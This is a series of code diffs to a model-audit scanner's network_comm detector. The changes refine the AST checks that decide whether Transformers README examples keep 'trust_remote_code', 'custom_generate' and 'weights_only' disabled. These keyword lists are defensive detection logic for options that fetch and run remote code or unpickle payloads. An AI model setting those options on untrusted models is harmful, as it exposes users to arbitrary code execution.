-            keyword.arg in _REMOTE_CODE_KEYWORDS and not _remote_code_option_is_disabled(keyword.arg, keyword.value)
+            keyword.arg in _REMOTE_CODE_KEYWORDS
+            and not remote_code_option_is_proven_disabled_at_call(keyword.arg, keyword.value, call)
             for keyword in call.keywords
         ):
             return False
@@ -3726,7 +3868,8 @@ def _is_valid_official_readme_sample_image_example(
             if node not in requests_calls and node.func.attr not in documented_attribute_calls:
                 return False
             if any(
-                keyword.arg in _REMOTE_CODE_KEYWORDS and not _remote_code_option_is_disabled(keyword.arg, keyword.value)
+                keyword.arg in _REMOTE_CODE_KEYWORDS
+                and not remote_code_option_is_proven_disabled_at_call(keyword.arg, keyword.value, node)
                 for keyword in node.keywords
             ):
                 return False

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2061,11 +2061,15 @@ def _matching_readme_image_fence_end(
 
 # Transformers keywords that cause Hub-hosted Python to be fetched and executed.
 _REMOTE_CODE_KEYWORDS = frozenset({"custom_generate", "trust_remote_code"})
+# `from_pretrained(weights_only=False)` also permits executable pickle payloads.
+_FROM_PRETRAINED_SAFETY_KEYWORDS = _REMOTE_CODE_KEYWORDS | {"weights_only"}
 
 
 def _remote_code_option_is_disabled(name: str, value: ast.expr) -> bool:
     if not isinstance(value, ast.Constant):
         return False
+    if name == "weights_only":
+        return value.value is True
     if name == "trust_remote_code":
         return value.value is False
     if name == "custom_generate":
@@ -2118,6 +2122,7 @@ def _remote_code_mapping_is_proven_safe(
     unsafe_names: frozenset[str],
     proven_mapping_call_ids: frozenset[int],
     call_position: int,
+    safety_keywords: frozenset[str] = _REMOTE_CODE_KEYWORDS,
 ) -> bool:
     memo: dict[int, bool] = {}
     remaining_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
@@ -2161,7 +2166,7 @@ def _remote_code_mapping_is_proven_safe(
                 if not isinstance(key, ast.Constant) or not isinstance(key.value, str):
                     result = False
                     break
-                if key.value in _REMOTE_CODE_KEYWORDS and not _remote_code_option_is_proven_disabled(
+                if key.value in safety_keywords and not _remote_code_option_is_proven_disabled(
                     key.value,
                     item_value,
                     bindings=bindings,
@@ -2867,12 +2872,15 @@ def _is_valid_official_readme_sample_image_example(
             return False
         return False
 
-    static_mapping_proof_cache: dict[int, bool] = {}
+    static_mapping_proof_cache: dict[tuple[int, frozenset[str]], bool] = {}
 
-    def static_mapping_expression_is_proven_safe(value: ast.expr) -> bool:
-        value_id = id(value)
-        if value_id in static_mapping_proof_cache:
-            return static_mapping_proof_cache[value_id]
+    def static_mapping_expression_is_proven_safe(
+        value: ast.expr,
+        safety_keywords: frozenset[str] = _REMOTE_CODE_KEYWORDS,
+    ) -> bool:
+        cache_key = (id(value), safety_keywords)
+        if cache_key in static_mapping_proof_cache:
+            return static_mapping_proof_cache[cache_key]
         if not proof_budget.consume(sum(1 for _node in ast.walk(value))):
             return False
         result = _remote_code_mapping_is_proven_safe(
@@ -2882,12 +2890,15 @@ def _is_valid_official_readme_sample_image_example(
             unsafe_names=frozenset(),
             proven_mapping_call_ids=frozenset(),
             call_position=0,
+            safety_keywords=safety_keywords,
         )
-        static_mapping_proof_cache[value_id] = result
+        static_mapping_proof_cache[cache_key] = result
         return result
 
     proven_safe_mapping_augassign_ids: set[int] = set()
     proven_safe_mapping_augassign_target_ids: set[int] = set()
+    proven_safe_from_pretrained_mapping_augassign_ids: set[int] = set()
+    proven_safe_from_pretrained_mapping_augassign_target_ids: set[int] = set()
     proven_identity_preserving_mapping_transfer_target_ids: set[int] = set()
     for node in nodes:
         if (
@@ -2908,6 +2919,15 @@ def _is_valid_official_readme_sample_image_example(
             continue
         proven_safe_mapping_augassign_ids.add(id(node))
         proven_safe_mapping_augassign_target_ids.add(id(node.target))
+        if static_mapping_expression_is_proven_safe(
+            base_bindings[0][1],
+            _FROM_PRETRAINED_SAFETY_KEYWORDS,
+        ) and static_mapping_expression_is_proven_safe(
+            node.value,
+            _FROM_PRETRAINED_SAFETY_KEYWORDS,
+        ):
+            proven_safe_from_pretrained_mapping_augassign_ids.add(id(node))
+            proven_safe_from_pretrained_mapping_augassign_target_ids.add(id(node.target))
 
     def mapping_write_preserves_alias_identity(write_node: ast.AST) -> bool:
         write_id = id(write_node)
@@ -3105,6 +3125,7 @@ def _is_valid_official_readme_sample_image_example(
     def unsafe_mapping_operations_for(
         proven_mapping_transfer_call_ids: frozenset[int],
         proven_mapping_operand_ids: frozenset[int],
+        proven_safe_augassign_ids: set[int],
     ) -> list[tuple[str, ast.AST]]:
         operations: list[tuple[str, ast.AST]] = [
             (node.id, node)
@@ -3120,7 +3141,7 @@ def _is_valid_official_readme_sample_image_example(
             if isinstance(node, ast.AugAssign)
             and isinstance(node.target, ast.Name)
             and node.target.id in aliased_mapping_names
-            and id(node) not in proven_safe_mapping_augassign_ids
+            and id(node) not in proven_safe_augassign_ids
         )
         return operations
 
@@ -3131,9 +3152,16 @@ def _is_valid_official_readme_sample_image_example(
         proven_mapping_call_ids: frozenset[int] = frozenset(),
         proven_mapping_binding_chains: dict[int, tuple[int, ...]] | None = None,
         proven_mapping_transfer_call_ids: frozenset[int] = frozenset(),
+        safety_keywords: frozenset[str] = _REMOTE_CODE_KEYWORDS,
     ) -> bool:
         if not proof_budget.consume(len(nodes)):
             return False
+        if safety_keywords == _FROM_PRETRAINED_SAFETY_KEYWORDS:
+            proven_safe_augassign_ids = proven_safe_from_pretrained_mapping_augassign_ids
+            proven_safe_augassign_target_ids = proven_safe_from_pretrained_mapping_augassign_target_ids
+        else:
+            proven_safe_augassign_ids = proven_safe_mapping_augassign_ids
+            proven_safe_augassign_target_ids = proven_safe_mapping_augassign_target_ids
         binding_chains = proven_mapping_binding_chains or {}
         relevant_binding_nodes = {
             name: [
@@ -3155,7 +3183,7 @@ def _is_valid_official_readme_sample_image_example(
             logical_write_nodes = [
                 write_node
                 for write_node in relevant_name_writes.get(name, [])
-                if id(write_node) not in proven_safe_mapping_augassign_target_ids
+                if id(write_node) not in proven_safe_augassign_target_ids
             ]
             logical_write_count = len(logical_write_nodes)
             exhaustive_branch_join = exhaustive_mapping_branch_bindings_precede_call(
@@ -3188,7 +3216,7 @@ def _is_valid_official_readme_sample_image_example(
         for name, write_nodes in relevant_name_writes.items():
             relevant_binding_counts.setdefault(
                 name,
-                sum(id(write_node) not in proven_safe_mapping_augassign_target_ids for write_node in write_nodes),
+                sum(id(write_node) not in proven_safe_augassign_target_ids for write_node in write_nodes),
             )
 
         def proven_mapping_operand_ids_for(mapping_value: ast.expr) -> frozenset[int]:
@@ -3237,6 +3265,7 @@ def _is_valid_official_readme_sample_image_example(
         for name, operation in unsafe_mapping_operations_for(
             proven_mapping_transfer_call_ids,
             proven_mapping_operand_ids,
+            proven_safe_augassign_ids,
         ):
             if not mapping_operation_may_affect_call(operation, call):
                 continue
@@ -3285,6 +3314,7 @@ def _is_valid_official_readme_sample_image_example(
             unsafe_names=frozenset(unsafe_names),
             proven_mapping_call_ids=proven_mapping_call_ids,
             call_position=call_position,
+            safety_keywords=safety_keywords,
         )
 
     remote_code_option_proof_cache: dict[tuple[str, int, int], bool] = {}
@@ -3322,15 +3352,24 @@ def _is_valid_official_readme_sample_image_example(
         remote_code_option_proof_cache[cache_key] = result
         return result
 
-    def call_has_only_proven_safe_mapping_arguments(value: ast.Call) -> bool:
+    def call_has_only_proven_safe_mapping_arguments(
+        value: ast.Call,
+        *,
+        safety_keywords: frozenset[str] = _REMOTE_CODE_KEYWORDS,
+    ) -> bool:
         return (
             not any(isinstance(argument, ast.Starred) for argument in value.args)
             and not any(
-                keyword.arg is None and not remote_code_mapping_is_proven_safe_at_call(keyword.value, value)
+                keyword.arg is None
+                and not remote_code_mapping_is_proven_safe_at_call(
+                    keyword.value,
+                    value,
+                    safety_keywords=safety_keywords,
+                )
                 for keyword in value.keywords
             )
             and not any(
-                keyword.arg in _REMOTE_CODE_KEYWORDS
+                keyword.arg in safety_keywords
                 and not remote_code_option_is_proven_disabled_at_call(keyword.arg, keyword.value, value)
                 for keyword in value.keywords
             )
@@ -3387,7 +3426,10 @@ def _is_valid_official_readme_sample_image_example(
     ) -> bool:
         return (
             isinstance(factory_call, ast.Call)
-            and call_has_only_proven_safe_mapping_arguments(factory_call)
+            and call_has_only_proven_safe_mapping_arguments(
+                factory_call,
+                safety_keywords=_FROM_PRETRAINED_SAFETY_KEYWORDS,
+            )
             and isinstance(factory_call.func, ast.Attribute)
             and factory_call.func.attr == "from_pretrained"
             and isinstance(factory_call.func.value, ast.Name)
@@ -4116,8 +4158,11 @@ def _is_valid_official_readme_sample_image_example(
         return bool(prior_bindings) and isinstance(prior_bindings[-1], ast.Dict)
 
     def named_sensitive_call_has_safe_options(call: ast.Call, callable_kinds: frozenset[str]) -> bool:
+        safety_keywords = (
+            _FROM_PRETRAINED_SAFETY_KEYWORDS if "from_pretrained" in callable_kinds else _REMOTE_CODE_KEYWORDS
+        )
         if any(
-            keyword.arg in _REMOTE_CODE_KEYWORDS
+            keyword.arg in safety_keywords
             and not remote_code_option_is_proven_disabled_at_call(keyword.arg, keyword.value, call)
             for keyword in call.keywords
         ):
@@ -4135,6 +4180,7 @@ def _is_valid_official_readme_sample_image_example(
                 proven_mapping_call_ids=proven_mapping_call_ids,
                 proven_mapping_binding_chains=proven_mapping_binding_chains,
                 proven_mapping_transfer_call_ids=proven_mapping_transfer_call_ids,
+                safety_keywords=safety_keywords,
             )
             for keyword in call.keywords
         )
@@ -4211,8 +4257,11 @@ def _is_valid_official_readme_sample_image_example(
         if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
             if node not in requests_calls and node.func.attr not in documented_attribute_calls:
                 return False
+            safety_keywords = (
+                _FROM_PRETRAINED_SAFETY_KEYWORDS if node.func.attr == "from_pretrained" else _REMOTE_CODE_KEYWORDS
+            )
             if any(
-                keyword.arg in _REMOTE_CODE_KEYWORDS
+                keyword.arg in safety_keywords
                 and not remote_code_option_is_proven_disabled_at_call(keyword.arg, keyword.value, node)
                 for keyword in node.keywords
             ):
@@ -4235,6 +4284,7 @@ def _is_valid_official_readme_sample_image_example(
                     proven_mapping_call_ids=proven_mapping_call_ids,
                     proven_mapping_binding_chains=proven_mapping_binding_chains,
                     proven_mapping_transfer_call_ids=proven_mapping_transfer_call_ids,
+                    safety_keywords=safety_keywords,
                 ):
                     return False
             attribute_root = node.func.value

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2118,6 +2118,8 @@ def _remote_code_mapping_is_proven_safe(
             result = node_id in proven_mapping_call_ids
         elif isinstance(current, ast.BinOp) and isinstance(current.op, ast.BitOr):
             result = visit(current.left, resolving) and visit(current.right, resolving)
+        elif isinstance(current, ast.IfExp):
+            result = visit(current.body, resolving) and visit(current.orelse, resolving)
         elif isinstance(current, ast.Dict):
             result = True
             for key, item_value in zip(current.keys, current.values, strict=True):
@@ -2348,7 +2350,7 @@ def _is_valid_official_readme_sample_image_example(
         if (
             not isinstance(parents.get(id(binding_node)), ast.Module)
             and (
-                isinstance(binding_node.value, (ast.Call, ast.Dict))
+                isinstance(binding_node.value, (ast.Call, ast.Dict, ast.IfExp))
                 or (isinstance(binding_node.value, ast.BinOp) and isinstance(binding_node.value.op, ast.BitOr))
             )
             and len(targets) == 1
@@ -2647,8 +2649,94 @@ def _is_valid_official_readme_sample_image_example(
             current_statement = container
         return False
 
+    def name_write_is_in_supported_enclosing_scope(node: ast.AST) -> bool:
+        if isinstance(node, ast.arg):
+            return False
+
+        current = node
+        while parent := parents.get(id(current)):
+            if isinstance(parent, ast.comprehension) and node_is_within(node, parent.target):
+                return False
+            if isinstance(parent, ast.Lambda) and current is parent.body:
+                return False
+            if isinstance(parent, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)) and any(
+                current is statement for statement in parent.body
+            ):
+                return False
+            current = parent
+        return True
+
+    def name_write_is_definitely_evaluated(node: ast.AST) -> bool:
+        current = node
+        named_expression: ast.NamedExpr | None = None
+        while parent := parents.get(id(current)):
+            if isinstance(parent, (ast.For, ast.AsyncFor)) and node_is_within(node, parent.target):
+                return False
+            if isinstance(parent, ast.NamedExpr) and node_is_within(node, parent.target):
+                named_expression = parent
+                break
+            if isinstance(parent, ast.stmt):
+                return True
+            current = parent
+        if named_expression is None:
+            return True
+
+        current = named_expression
+        while parent := parents.get(id(current)):
+            if isinstance(parent, ast.BoolOp):
+                current_index = next(
+                    (index for index, value in enumerate(parent.values) if value is current),
+                    None,
+                )
+                if current_index is None:
+                    return False
+                required_truth = isinstance(parent.op, ast.And)
+                if any(
+                    not isinstance(value, ast.Constant)
+                    or not isinstance(value.value, bool)
+                    or value.value is not required_truth
+                    for value in parent.values[:current_index]
+                ):
+                    return False
+            elif isinstance(parent, ast.IfExp):
+                if current is parent.test:
+                    pass
+                elif current is parent.body:
+                    if not (
+                        isinstance(parent.test, ast.Constant)
+                        and isinstance(parent.test.value, bool)
+                        and parent.test.value
+                    ):
+                        return False
+                elif current is parent.orelse:
+                    if not (
+                        isinstance(parent.test, ast.Constant)
+                        and isinstance(parent.test.value, bool)
+                        and not parent.test.value
+                    ):
+                        return False
+                else:
+                    return False
+            elif isinstance(
+                parent,
+                (ast.Lambda, ast.GeneratorExp, ast.ListComp, ast.SetComp, ast.DictComp, ast.comprehension),
+            ):
+                return False
+            elif isinstance(parent, ast.Compare):
+                if current is not parent.left and (not parent.comparators or current is not parent.comparators[0]):
+                    return False
+            if isinstance(parent, ast.stmt):
+                return not (isinstance(parent, ast.Assert) and current is parent.msg)
+            current = parent
+        return True
+
     def node_is_proven_executed_before(node: ast.AST, reference: ast.AST) -> bool:
-        if node_is_statically_unreachable(node) or not operation_definitely_follows_reference(reference, node):
+        if (
+            not name_write_is_in_supported_enclosing_scope(node)
+            or not name_write_is_definitely_evaluated(node)
+            or node_is_statically_unreachable(node)
+            or not operation_definitely_follows_reference(reference, node)
+        ):
             return False
         node_membership = direct_statement_membership(node)
         reference_membership = direct_statement_membership(reference)
@@ -2816,9 +2904,9 @@ def _is_valid_official_readme_sample_image_example(
     def is_proven_mapping_use(
         node: ast.Name,
         proven_mapping_transfer_call_ids: frozenset[int],
-        proven_union_operand_ids: frozenset[int],
+        proven_mapping_operand_ids: frozenset[int],
     ) -> bool:
-        if id(node) in proven_union_operand_ids:
+        if id(node) in proven_mapping_operand_ids:
             return True
         parent = parents.get(id(node))
         if (
@@ -2848,7 +2936,7 @@ def _is_valid_official_readme_sample_image_example(
 
     def unsafe_mapping_operations_for(
         proven_mapping_transfer_call_ids: frozenset[int],
-        proven_union_operand_ids: frozenset[int],
+        proven_mapping_operand_ids: frozenset[int],
     ) -> list[tuple[str, ast.AST]]:
         operations: list[tuple[str, ast.AST]] = [
             (node.id, node)
@@ -2856,7 +2944,7 @@ def _is_valid_official_readme_sample_image_example(
             if isinstance(node, ast.Name)
             and isinstance(node.ctx, ast.Load)
             and node.id in aliased_mapping_names
-            and not is_proven_mapping_use(node, proven_mapping_transfer_call_ids, proven_union_operand_ids)
+            and not is_proven_mapping_use(node, proven_mapping_transfer_call_ids, proven_mapping_operand_ids)
         ]
         operations.extend(
             (node.target.id, node)
@@ -2926,7 +3014,7 @@ def _is_valid_official_readme_sample_image_example(
         for name, write_nodes in relevant_name_writes.items():
             relevant_binding_counts.setdefault(name, len(write_nodes))
 
-        def proven_union_operand_ids_for(mapping_value: ast.expr) -> frozenset[int]:
+        def proven_mapping_operand_ids_for(mapping_value: ast.expr) -> frozenset[int]:
             remaining_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
             seen: set[int] = set()
             operand_ids: set[int] = set()
@@ -2954,18 +3042,24 @@ def _is_valid_official_readme_sample_image_example(
                     if isinstance(current.right, ast.Name):
                         operand_ids.add(id(current.right))
                     pending.extend((current.left, current.right))
+                elif isinstance(current, ast.IfExp):
+                    if isinstance(current.body, ast.Name):
+                        operand_ids.add(id(current.body))
+                    if isinstance(current.orelse, ast.Name):
+                        operand_ids.add(id(current.orelse))
+                    pending.extend((current.body, current.orelse))
                 elif isinstance(current, ast.Dict):
                     pending.extend(
                         item_value for key, item_value in zip(current.keys, current.values, strict=True) if key is None
                     )
             return frozenset(operand_ids)
 
-        proven_union_operand_ids = proven_union_operand_ids_for(value)
+        proven_mapping_operand_ids = proven_mapping_operand_ids_for(value)
         unsafe_names: set[str] = set()
         remaining_alias_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
         for name, operation in unsafe_mapping_operations_for(
             proven_mapping_transfer_call_ids,
-            proven_union_operand_ids,
+            proven_mapping_operand_ids,
         ):
             if not mapping_operation_may_affect_call(operation, call):
                 continue

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2912,12 +2912,22 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         )
 
     def is_allowed_local_device(value: ast.expr) -> bool:
-        if not isinstance(value, ast.Constant) or not isinstance(value.value, str):
-            return False
-        device = value.value
-        return device in {"cpu", "cuda", "mps"} or (
-            device.startswith("cuda:") and device.removeprefix("cuda:").isdecimal()
-        )
+        pending_values = [value]
+        remaining_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
+        while pending_values and remaining_steps > 0:
+            remaining_steps -= 1
+            device_value = pending_values.pop()
+            if isinstance(device_value, ast.IfExp):
+                pending_values.extend((device_value.body, device_value.orelse))
+                continue
+            if not isinstance(device_value, ast.Constant) or not isinstance(device_value.value, str):
+                return False
+            device = device_value.value
+            if device not in {"cpu", "cuda", "mps"} and not (
+                device.startswith("cuda:") and device.removeprefix("cuda:").isdecimal()
+            ):
+                return False
+        return not pending_values
 
     def mapping_device_is_proven_safe(value: ast.expr, binding_node: ast.AST) -> bool:
         if is_allowed_local_device(value):

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2931,9 +2931,11 @@ def _is_valid_official_readme_sample_image_example(
 
     def mapping_write_preserves_alias_identity(write_node: ast.AST) -> bool:
         write_id = id(write_node)
+        parent = parents.get(write_id)
         return (
             write_id in proven_safe_mapping_augassign_target_ids
             or write_id in proven_identity_preserving_mapping_transfer_target_ids
+            or (isinstance(parent, ast.AnnAssign) and parent.target is write_node and parent.value is None)
         )
 
     mapping_alias_targets = {

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2277,6 +2277,7 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     }
     allowed_targets: set[int] = set()
     mapping_bindings: dict[str, list[tuple[ast.AST, ast.expr]]] = {}
+    single_name_bindings: dict[str, list[tuple[ast.AST, ast.expr]]] = {}
     mapping_aliases: list[tuple[ast.AST, str, str]] = []
     name_write_nodes: dict[str, list[ast.AST]] = {}
     for node in nodes:
@@ -2306,9 +2307,11 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         if not isinstance(binding_node, (ast.Assign, ast.AnnAssign)):
             continue
         targets = binding_node.targets if isinstance(binding_node, ast.Assign) else [binding_node.target]
+        if binding_node.value is not None and len(targets) == 1 and isinstance(targets[0], ast.Name):
+            single_name_bindings.setdefault(targets[0].id, []).append((binding_node, binding_node.value))
         if (
             not isinstance(parents.get(id(binding_node)), ast.Module)
-            and isinstance(binding_node.value, ast.Call)
+            and isinstance(binding_node.value, (ast.Call, ast.Dict))
             and len(targets) == 1
             and isinstance(targets[0], ast.Name)
         ):
@@ -2366,8 +2369,8 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             and Counter(write_indices) == Counter(binding_indices)
         )
 
-    def call_execution_may_be_deferred(call: ast.Call) -> bool:
-        current: ast.AST = call
+    def execution_may_be_deferred(reference: ast.AST) -> bool:
+        current = reference
         while parent := parents.get(id(current)):
             if isinstance(parent, ast.GeneratorExp):
                 return True
@@ -2408,22 +2411,24 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             return field_name in {"body", "orelse"}
         return isinstance(container, ast.With) and field_name == "body" and is_canonical_no_grad_with(container)
 
-    def nested_mapping_binding_precedes_call(binding: ast.AST, call: ast.Call) -> bool:
-        if call_execution_may_be_deferred(call):
+    def binding_precedes_reference_in_supported_body(binding: ast.AST, reference: ast.AST) -> bool:
+        if execution_may_be_deferred(reference):
             return False
         binding_membership = direct_statement_membership(binding)
-        call_membership = direct_statement_membership(call)
-        if binding_membership is None or call_membership is None:
+        reference_membership = direct_statement_membership(reference)
+        if binding_membership is None or reference_membership is None:
             return False
         binding_container, binding_field, binding_index, binding_statement = binding_membership
-        call_container, call_field, call_index, call_statement = call_membership
+        reference_container, reference_field, reference_index, reference_statement = reference_membership
+        reference_is_direct_statement = reference_statement is reference or (
+            isinstance(reference_statement, ast.Expr) and reference_statement.value is reference
+        )
         if (
-            binding_container is not call_container
-            or binding_field != call_field
+            binding_container is not reference_container
+            or binding_field != reference_field
             or binding_statement is not binding
-            or not isinstance(call_statement, ast.Expr)
-            or call_statement.value is not call
-            or binding_index >= call_index
+            or not reference_is_direct_statement
+            or binding_index >= reference_index
             or not is_single_execution_body(binding_container, binding_field)
         ):
             return False
@@ -2443,21 +2448,31 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             container = parent
         return True
 
-    def mapping_binding_position_at_call(binding: ast.AST, call: ast.Call) -> int:
+    def binding_position_at_reference(binding: ast.AST, reference: ast.AST) -> int:
         binding_position = top_level_statement_indices[id(binding)]
-        call_position = top_level_statement_indices[id(call)]
+        reference_position = top_level_statement_indices[id(reference)]
         if not isinstance(parents.get(id(binding)), ast.Module):
-            return call_position - 1 if nested_mapping_binding_precedes_call(binding, call) else call_position
+            if binding_precedes_reference_in_supported_body(binding, reference):
+                return reference_position - 1
+            return reference_position
         return binding_position
 
-    def mapping_operation_may_affect_call(operation: ast.AST, call: ast.Call) -> bool:
-        if call_execution_may_be_deferred(call):
+    def mapping_binding_position_at_call(binding: ast.AST, call: ast.Call) -> int:
+        return binding_position_at_reference(binding, call)
+
+    def operation_may_affect_reference(operation: ast.AST, reference: ast.AST) -> bool:
+        if execution_may_be_deferred(reference):
             return True
-        if getattr(operation, "lineno", None) == call.lineno:
+        operation_line = getattr(operation, "lineno", None)
+        reference_line = getattr(reference, "lineno", None)
+        if operation_line is not None and operation_line == reference_line:
             return True
         operation_index = top_level_statement_indices.get(id(operation))
-        call_index = top_level_statement_indices.get(id(call))
-        return operation_index is None or call_index is None or operation_index <= call_index
+        reference_index = top_level_statement_indices.get(id(reference))
+        return operation_index is None or reference_index is None or operation_index <= reference_index
+
+    def mapping_operation_may_affect_call(operation: ast.AST, call: ast.Call) -> bool:
+        return operation_may_affect_reference(operation, call)
 
     aliased_mapping_names = set(mapping_bindings)
     for _binding_node, first_name, second_name in mapping_aliases:
@@ -2599,9 +2614,9 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         binding_node: ast.AST,
         allowed_factory_names: set[str],
     ) -> bool:
-        def operation_may_affect_reference(operation: ast.AST) -> bool:
+        def instance_operation_may_affect_reference(operation: ast.AST) -> bool:
             if isinstance(binding_node, ast.Call):
-                if call_execution_may_be_deferred(binding_node):
+                if execution_may_be_deferred(binding_node):
                     return True
                 operation_index = top_level_statement_indices.get(id(operation))
                 reference_index = top_level_statement_indices.get(id(binding_node))
@@ -2615,10 +2630,11 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         instance_bindings = [
             (instance_binding, factory_call)
             for instance_binding, factory_call in mapping_bindings.get(instance_name, [])
-            if operation_may_affect_reference(instance_binding)
+            if instance_operation_may_affect_reference(instance_binding)
         ]
         relevant_write_count = sum(
-            operation_may_affect_reference(write_node) for write_node in name_write_nodes.get(instance_name, [])
+            instance_operation_may_affect_reference(write_node)
+            for write_node in name_write_nodes.get(instance_name, [])
         )
         if len(instance_bindings) != 1 or relevant_write_count != 1:
             return False
@@ -2654,16 +2670,23 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             return False
         device_bindings = [
             (device_binding, device_value)
-            for device_binding, device_value in mapping_bindings.get(value.id, [])
-            if top_level_statement_precedes(device_binding, binding_node)
+            for device_binding, device_value in single_name_bindings.get(value.id, [])
+            if operation_may_affect_reference(device_binding, binding_node)
         ]
-        prior_write_count = sum(
-            top_level_statement_precedes(write_node, binding_node) for write_node in name_write_nodes.get(value.id, [])
+        relevant_write_count = sum(
+            operation_may_affect_reference(write_node, binding_node)
+            for write_node in name_write_nodes.get(value.id, [])
         )
-        if len(device_bindings) != 1 or prior_write_count != 1:
+        if len(device_bindings) != 1 or relevant_write_count != 1:
             return False
         device_binding, device_value = device_bindings[0]
-        return is_single_name_binding(device_binding, device_value, value.id) and is_allowed_local_device(device_value)
+        reference_position = top_level_statement_indices.get(id(binding_node))
+        return (
+            reference_position is not None
+            and binding_position_at_reference(device_binding, binding_node) < reference_position
+            and is_single_name_binding(device_binding, device_value, value.id)
+            and is_allowed_local_device(device_value)
+        )
 
     def unwrap_safe_mapping_device_transfers(
         value: ast.expr,
@@ -2759,12 +2782,21 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         proven_mapping_call_id_set.add(id(binding_value))
         proven_mapping_transfer_call_id_set.update(id(transfer_call) for transfer_call in transfer_calls)
 
+    def proven_mapping_binding_precedes_call(mapping_name: str, call: ast.Call) -> bool:
+        call_position = top_level_statement_indices[id(call)]
+        prior_bindings = [
+            binding_node
+            for binding_node, _binding_value in mapping_bindings.get(mapping_name, [])
+            if mapping_binding_position_at_call(binding_node, call) < call_position
+        ]
+        return bool(prior_bindings) and id(prior_bindings[-1]) in proven_mapping_binding_chains
+
     standalone_transfer_calls = sorted(
         (node.value for node in nodes if isinstance(node, ast.Expr) and isinstance(node.value, ast.Call)),
         key=lambda call: top_level_statement_indices.get(id(call), len(tree.body)),
     )
     for transfer_call in standalone_transfer_calls:
-        if call_execution_may_be_deferred(transfer_call):
+        if execution_may_be_deferred(transfer_call):
             continue
         unwrapped_mapping = unwrap_safe_mapping_device_transfers(transfer_call, transfer_call)
         if unwrapped_mapping is None:
@@ -2797,7 +2829,7 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             not isinstance(generate_call, ast.Call)
             or not isinstance(generate_call.func, ast.Attribute)
             or generate_call.func.attr != "generate"
-            or call_execution_may_be_deferred(generate_call)
+            or execution_may_be_deferred(generate_call)
         ):
             continue
         for keyword in generate_call.keywords:
@@ -2807,7 +2839,22 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             if unwrapped_mapping is None:
                 continue
             mapping_value, transfer_calls = unwrapped_mapping
-            if not trusted_mapping_factory_call_is_proven_safe(generate_call, mapping_value):
+            mapping_is_proven_safe = trusted_mapping_factory_call_is_proven_safe(generate_call, mapping_value)
+            if not mapping_is_proven_safe and transfer_calls and isinstance(mapping_value, ast.Name):
+                candidate_transfer_call_ids = frozenset(
+                    proven_mapping_transfer_call_id_set | {id(candidate) for candidate in transfer_calls}
+                )
+                mapping_is_proven_safe = proven_mapping_binding_precedes_call(
+                    mapping_value.id,
+                    generate_call,
+                ) and remote_code_mapping_is_proven_safe_at_call(
+                    mapping_value,
+                    generate_call,
+                    proven_mapping_call_ids=frozenset(proven_mapping_call_id_set),
+                    proven_mapping_binding_chains=proven_mapping_binding_chains,
+                    proven_mapping_transfer_call_ids=candidate_transfer_call_ids,
+                )
+            if not mapping_is_proven_safe:
                 continue
             proven_mapping_call_id_set.add(id(keyword.value))
             proven_mapping_transfer_call_id_set.update(id(transfer_call) for transfer_call in transfer_calls)

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2864,6 +2864,19 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             )
         )
 
+    def transformers_factory_call_is_proven_safe(
+        factory_call: ast.expr,
+        allowed_factory_names: set[str],
+    ) -> bool:
+        return (
+            isinstance(factory_call, ast.Call)
+            and call_has_only_proven_safe_mapping_arguments(factory_call)
+            and isinstance(factory_call.func, ast.Attribute)
+            and factory_call.func.attr == "from_pretrained"
+            and isinstance(factory_call.func.value, ast.Name)
+            and factory_call.func.value.id in allowed_factory_names
+        )
+
     def trusted_transformers_instance_is_proven_safe(
         instance_name: str,
         binding_node: ast.AST,
@@ -2894,14 +2907,8 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         if len(instance_bindings) != 1 or relevant_write_count != 1:
             return False
         instance_binding, factory_call = instance_bindings[0]
-        return (
-            isinstance(factory_call, ast.Call)
-            and call_has_only_proven_safe_mapping_arguments(factory_call)
-            and is_single_name_binding(instance_binding, factory_call, instance_name)
-            and isinstance(factory_call.func, ast.Attribute)
-            and factory_call.func.attr == "from_pretrained"
-            and isinstance(factory_call.func.value, ast.Name)
-            and factory_call.func.value.id in allowed_factory_names
+        return transformers_factory_call_is_proven_safe(factory_call, allowed_factory_names) and is_single_name_binding(
+            instance_binding, factory_call, instance_name
         )
 
     def is_allowed_local_device(value: ast.expr) -> bool:
@@ -3180,14 +3187,7 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
                 return resolve_value(value.value, reference)
             if isinstance(value, ast.Subscript):
                 return resolve_value(value.value, reference)
-            if (
-                isinstance(value, ast.Call)
-                and isinstance(value.func, ast.Attribute)
-                and value.func.attr == "from_pretrained"
-                and isinstance(value.func.value, ast.Name)
-                and value.func.value.id in transformers_mapping_factory_names
-                and call_has_only_proven_safe_mapping_arguments(value)
-            ):
+            if transformers_factory_call_is_proven_safe(value, transformers_factory_names):
                 return frozenset({benign_callable_marker})
             return frozenset({untrusted_callable_marker})
 

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
